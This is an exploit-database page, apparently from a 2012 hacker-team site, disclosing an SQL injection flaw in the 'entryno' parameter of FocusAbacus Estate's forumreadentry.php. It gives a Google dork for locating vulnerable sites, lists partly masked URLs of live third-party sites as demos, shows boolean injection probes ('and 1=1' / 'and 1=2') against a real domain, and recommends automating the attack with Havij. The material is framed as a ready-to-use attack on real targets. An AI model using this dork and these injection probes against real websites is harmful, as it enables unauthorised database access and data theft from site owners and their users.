FocusAbacus Estate Remote SQL Injection Vulnerability

2012.11.08

Credit: KnocKout

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: inurl:forumreadentry.php?entryno=

FocusAbacus Estate - Remote SQL Injection Vulnerability
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : mr.inj3ct0r[at]gmail.com                      1
0                                                                      0
1               #########################################              1
0               I'm KnocKout member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[~] HomePage : 1337day.com / h4x0resec.blogspot.com / Cyber-warrior.org 
[~] Reference : http://h4x0resec.blogspot.com
[~] Say : "Have you forgotten me, brothers and sisters?"
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : FocusAbacus Estate
|~Price : N/A
|~Version : ALL
|~Software Official : http://www.focusabacus.net
|~Vulnerability : SQL Injection
|~Vulnerability Dir : /
|~Risk : Critical 
|~Google DORK : inurl:forumreadentry.php?entryno=
|[~]Date : "07.11.2012"
|[~]Tested on : (focusabacus.net)
Web Server:     Apache/2.2.22
Powered-by:     PHP/5.3.15
Sql Version:    5.1.26-rc-5.1.26rc-log
----------------------------------------------------------
forumreadentry.php <= 'entryno' Functions Not Security
---------------------------------------------------------
Demo:
http://www.eXXXXk.im/forumreadentry.php?entryno=1227
http://www.hyXXXXommune.com/forumreadentry.php?entryno=174
http://www.aqXXXtona.com/forumreadentry.php?entryno=1364
http://www.vnXXXat.net/forumreadentry.php?entryno=792
..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
|{~~~~~~~~ Explotation| SQL Injection ~~~~~~~~~~}|
 
http://www.focuXXXacus.net/forumreadentry.php?entryno=152 and 1=1
http://www.focuXXXacus.net/forumreadentry.php?entryno=152 and 1=2
 
Automatic It is recommended for use HAVIJ
 
================================================================ 

References:

http://h4x0resec.blogspot.com

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

FocusAbacus Estate Remote SQL Injection Vulnerability

Dork: inurl:forumreadentry.php?entryno=

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.